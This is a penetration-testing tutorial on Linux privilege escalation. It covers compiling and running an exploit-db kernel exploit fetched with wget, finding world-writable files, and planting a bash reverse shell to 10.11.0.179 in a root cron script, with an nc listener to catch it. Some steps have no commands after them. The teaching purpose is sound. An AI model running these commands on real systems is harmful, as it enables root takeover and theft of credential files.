PRIVILEGE ESCATION IN LINUX
PRIVILEGE ESCALATION - Overview
Priv Esc is the process of increasing the level of access on a machine or network. This is normally performed as part of the post-exploitation phase. As attackers we try to increase our level of control on a system and expand our reach in to the network. In most operating systems and networked environments, the process of privilege escalation is inherently prevented in order to adhere to the User Privilege Seperation Model. Therfor by definition, the process of Privilege Escalation will involve breaking the security model. To our aid in this process, comes vulnerable and outdated software, administrative misconfigurations and human error, which all may lead to chinks in the armour of the User Separation Security Model.
We will start by looking at Privilege Escalation exploits. These exploits work by targeted higher privilege services or systems such as drivers or kernal functions and when successful, these exploits often allow full elevation of access or privileges.
PRIVILEGE ESCALATION - Exploits in Linux
In this scenario, we have SSH credentials for a user on a Ubuntu machine. We want to use this machine as a pivot point in to the Network however we need root privileges in order to complete the task. The discovered credentials do not have root privileges.
After a bit of prodding, we discover that the machine is running a 32bit version of Ubuntu:
and may even be running a vulnerable kernel
After some googling and researching we decide to use a Linux Kernel Root Exploit which was found in the exploit database - exploit-db.com/exploits/18411/ as it seems to be the closest match to our kernel version and operating system.
After inspecting the code, we download the exploit to the victim machine and then proceed to compile and run it.
In order to download the file to the victim Ubuntu machine, copy the link for the exploit then use wget:
#wget -o exploit.c https://exploit-db.com/exploits/18411/
Once downloaded, we will proceed to compile the exploit to a binary file:
#gcc exploit.c -o exploit
Confirm that the file has been created as expected:
Check current user privileges:
Proceed to run the exploit
Check the current privileges once more:
List the contents of the shadow file
Of course, not all exploits work so smoothly and might need some tinkering and experimentation before they will work. It is important to remember that these exploits often target critical system elements and an unsuccesful exploitation attempt, may lead to a crashed system. Check the lab guide for more detail on this exploit and others like it.
PRIVILEGE ESCALATION - Abusing weak service Permissions on Linux
A classic Linux equivalent demonstration for file and folder permission issues would involve looking for permission misconfigurations on files and scripts which have sudo or world writable permissions on a local linux file system. This could include:
- suid binaries
- cron jobs
- boot files
On a linux system, we will search the system for world writable files:
#find / -perm -2 ! -type l -ls 2>/dev/null
Look for custom cron scripts etc. Check the permissions - are they too permissive?
permissions such as -rwxrwxrwx will allow anyone to edit the file and the file will be executed with root privileges.
If we find a file that we can modify, we can add reverse shell with something like this added in to the file:
bash -i >& /dev/tcp/10.11.0.179/443 0>&1
Save and Exit the file.
Setup a listener on the attacking machine:
#nc -lvp 443
Now when the cron job runs again, the reverse shell executes and since it was run with root privileges we now have root access to the machine.
PRIVILEGE ESCALATION SUMMARY:
- exploit a vulnerable service with high privileges.
- exploit various misconfigurations on the target.
- sensitive files left on the file system
- excel files with the keys to the kingdom.
- group policy configuration files
- unattended configuration files
- badly written scripts with info within.
- stay up to date